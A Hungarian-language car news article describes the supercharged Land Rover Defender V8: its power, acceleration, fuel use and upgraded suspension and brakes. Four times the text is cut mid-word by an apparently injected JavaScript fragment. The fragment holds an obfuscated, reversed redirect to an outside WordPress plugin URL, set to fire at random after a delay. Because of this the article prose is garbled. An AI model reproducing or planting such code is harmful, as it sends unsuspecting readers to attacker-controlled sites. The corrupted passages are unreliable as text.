Tévedtünk, amikor azt hittük, a plug-in hibrid hajtáslánc lesz az új Defender széria csúcsmotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torja: most bemutatkozott az igazi toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topmodell, a kompresszoros, nyolchengeres behemóttal szerelt Defender V8. A nyugalom megzavarására alkalmas számok következnek: 525 lóerő, 625 Nm, álló helyzetből 5,2 másodperces gyorsulás 100 km/órára, 240 km/óra végsebesség – és mindehhez norma szerint 14,5 literes átlagfogyasztás. Ez öngyilkosság volna megfelelő futómű nélkül, de a Land Rover erre is gondolt: lecserélték a lengéscsillapítókat és rugókat, masszívabb kanyarstabilizátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torokat építettek be, újrahangolták a kormányművet, és iszonyatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos fékeket (20 colos tárcsák!) szereltek be. Ehhez társul az elektronikus aktív hátsó differenciálmű, amely ráfordítja az ívre az autót, a Terrain…
- Hirdetés -